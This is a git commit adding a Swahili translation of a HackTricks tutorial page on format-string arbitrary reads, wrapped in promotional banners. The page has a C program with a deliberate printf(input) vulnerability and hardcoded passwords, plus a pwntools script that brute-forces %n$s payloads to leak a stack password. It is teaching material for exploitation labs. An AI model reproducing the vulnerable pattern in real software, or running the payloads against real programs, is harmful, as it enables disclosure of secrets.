Translated ['binary-exploitation/format-strings/format-strings-arbitrary

2024-11-22 20:53:37 +00:00 · 2024-04-18 17:51:32 +00:00 · 2024-04-18 17:51:32 +00:00 · baf0112863
commit baf0112863
parent 905ab5d674
12 changed files with 99 additions and 0 deletions
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/SUMMARY.md
+++ b/SUMMARY.md
@ -715,6 +715,7 @@
 * [Array Indexing](binary-exploitation/array-indexing.md)
 * [Integer Overflow](binary-exploitation/integer-overflow.md)
 * [Format Strings](binary-exploitation/format-strings/README.md)
+  * [Format Strings - Arbitrary Read Example](binary-exploitation/format-strings/format-strings-arbitrary-read-example.md)
  * [Format Strings Template](binary-exploitation/format-strings/format-strings-template.md)
 * [Heap](binary-exploitation/heap/README.md)
  * [Use After Free](binary-exploitation/heap/use-after-free.md)
--- a/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md
+++ b/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md
@ -0,0 +1,98 @@
+# Mfumo wa Vipande vya Nakala - Mfano wa Kusoma Kiholela
+
+<details>
+
+<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
+
+Njia nyingine za kusaidia HackTricks:
+
+* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
+* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
+* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
+* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
+
+</details>
+
+## Kanuni
+```c
+#include <stdio.h>
+#include <string.h>
+
+char bss_password[20] = "hardcodedPassBSS"; // Password in BSS
+
+int main() {
+char stack_password[20] = "secretStackPass"; // Password in stack
+char input1[20], input2[20];
+
+printf("Enter first password: ");
+scanf("%19s", input1);
+
+printf("Enter second password: ");
+scanf("%19s", input2);
+
+// Vulnerable printf
+printf(input1);
+printf("\n");
+
+// Check both passwords
+if (strcmp(input1, stack_password) == 0 && strcmp(input2, bss_password) == 0) {
+printf("Access Granted.\n");
+} else {
+printf("Access Denied.\n");
+}
+
+return 0;
+}
+```
+Itafsiri kwa:
+```bash
+clang -o fs-read fs-read.c -Wno-format-security
+```
+### Soma kutoka kwenye stack
+
+**`stack_password`** itahifadhiwa kwenye stack kwa sababu ni variable ya ndani, hivyo kutumia printf kuonyesha maudhui ya stack ni ya kutosha. Hii ni exploit ya BF ya nafasi 100 za kwanza kufichua nywila kutoka kwenye stack:
+```python
+from pwn import *
+
+for i in range(100):
+print(f"Try: {i}")
+payload = f"%{i}$s\na".encode()
+p = process("./fs-read")
+p.sendline(payload)
+output = p.clean()
+print(output)
+p.close()
+```
+Katika picha niwezo kuona tunaweza kuvuja nywila kutoka kwenye stack katika nafasi ya `10th`:
+
+<figure><img src="../../.gitbook/assets/image (1231).png" alt=""><figcaption></figcaption></figure>
+
+<figure><img src="../../.gitbook/assets/image (1230).png" alt="" width="338"><figcaption></figcaption></figure>
+
+Ukiendesha shambulizi lile lile lakini ukitumia `%p` badala ya `%s` niwezo kuvuja anwani ya heap kutoka kwenye stack kwa `%5$p`:
+
+<figure><img src="../../.gitbook/assets/image (1232).png" alt=""><figcaption></figcaption></figure>
+
+<figure><img src="../../.gitbook/assets/image (1233).png" alt=""><figcaption></figcaption></figure>
+
+<figure><img src="../../.gitbook/assets/image (1234).png" alt=""><figcaption></figcaption></figure>
+
+Tofauti kati ya anwani iliyovuja na anwani ya nywila ni:
+```
+> print 0xaaaaaaac12b2 - 0xaaaaaaac0048
+$1 = 0x126a
+```
+<details>
+
+<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
+
+Njia nyingine za kusaidia HackTricks:
+
+* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
+* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
+* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
+* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
+
+</details>